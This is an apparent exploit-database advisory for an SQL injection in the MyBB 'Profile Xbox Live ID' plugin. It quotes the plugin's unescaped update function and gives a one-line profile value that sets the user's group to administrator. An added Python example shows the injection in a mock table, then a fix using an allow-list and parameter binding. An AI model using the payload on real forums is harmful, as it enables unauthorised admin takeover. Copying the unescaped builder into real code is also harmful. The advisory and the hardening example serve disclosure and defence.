
MyBB Profile Xbox Live ID SQL Injection Vulnerability

Author: n3urot0xin
Risk: Security Risk High
0day-ID: 0day-ID-20001
Category: web applications
Date added: 18-12-2012
Platform: php
Title: MyBB Profile Xbox Live ID SQL Injection
Vendor: http://mods.mybb.com/view/profile-xbox-live-id
Author: Josephvb10
Exploit Author: n3urot0xin

Code:
function profilexli_update($xli)
{
    global $mybb;

    if (isset($mybb->input['xli']))
    {
        // Request input is copied into the update data unescaped and unvalidated.
        $xli->user_update_data['xli'] = $mybb->input['xli'];
    }
}

Become admin (SQLi Ex):
Edit Profile -> XBL ID = x', usergroup='4
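
Why that profile value changes the user group, and a hardened update path, shown as an added example (not code from the plugin or from MyBB). It assumes the update builder wraps values in quotes without escaping them; the SQLite table, the function names and the gamertag pattern are constructed for illustration.

```python
import re
import sqlite3

# Assumed gamertag shape for this example: 1-15 letters, digits or spaces.
GAMERTAG_RE = re.compile(r"[A-Za-z0-9 ]{1,15}")

def make_db():
    """Constructed stand-in for the forum's users table (not MyBB's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, usergroup TEXT, xli TEXT)")
    db.execute("INSERT INTO users VALUES (1, '2', '')")
    return db

def build_update_unescaped(table, data, where):
    """Model of a builder that wraps each value in quotes but does not escape it."""
    sets = ", ".join(f"{col}='{val}'" for col, val in data.items())
    return f"UPDATE {table} SET {sets} WHERE {where}"

def update_vulnerable(db, uid, xli):
    # Same flow as profilexli_update(): raw input goes straight into the update data.
    db.execute(build_update_unescaped("users", {"xli": xli}, f"uid={int(uid)}"))

def update_hardened(db, uid, xli):
    # Allow-list the value, then bind it as a parameter so it can only ever be data.
    if not GAMERTAG_RE.fullmatch(xli):
        raise ValueError("invalid Xbox Live ID")
    db.execute("UPDATE users SET xli = ? WHERE uid = ?", (xli, int(uid)))

def usergroup(db, uid):
    return db.execute("SELECT usergroup FROM users WHERE uid = ?", (uid,)).fetchone()[0]

def demo():
    value = "x', usergroup='4"  # the profile value quoted on this page
    db = make_db()
    update_vulnerable(db, 1, value)
    vulnerable = usergroup(db, 1)  # the quote ends the string; usergroup is overwritten
    db = make_db()
    try:
        update_hardened(db, 1, value)
        rejected = False
    except ValueError:
        rejected = True
    return {"vulnerable": vulnerable, "rejected": rejected, "hardened": usergroup(db, 1)}

if __name__ == "__main__":
    print(demo())
```

In the plugin itself the equivalent change is to validate the submitted value and pass it through MyBB's `$db->escape_string()` before assigning it to `user_update_data`.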
